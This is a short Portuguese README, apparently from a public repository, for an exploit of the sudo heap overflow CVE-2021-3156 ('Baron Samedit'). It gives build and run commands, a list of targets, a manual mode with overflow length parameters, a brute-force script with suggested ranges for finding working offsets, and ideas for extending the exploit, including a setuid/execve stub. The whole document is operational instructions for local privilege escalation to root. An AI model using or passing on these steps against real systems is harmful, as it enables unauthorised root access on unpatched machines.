Este é um exploit para o CVE-2021-3156 vulnerabilidade no sudo (apelidada de Baron Samedit by Qualys).
build:
$ make
lista de alvos:
$ ./sudo-hax-me-a-sandwich
run:
$ ./sudo-hax-me-a-sandwich <target_number>
modo manual:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Assegure-se de ter GNU parallel instalado.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
alguns padrões para tentar:
$ ./brute.sh 90 120 50 70 150 300
Irá consumir todos os núcleos disponíveis. Não tente fazer netflix & brute.
Contribua com o repositorio Enviar PR (sensato), posso fundir. Deixem um star
Algumas ideias:
- Mais alvos
- Localização de alvo
- Outras estratégias de exploração
- Funcionalidade mais independente:
- Incorpore a biblioteca compartilhada hax.c (diminua, por favor, ELF golf + asm setuid / execve stub)
- Adicione a lógica mkdir ao hax.c
- Limpeza de diretório / biblioteca compartilhada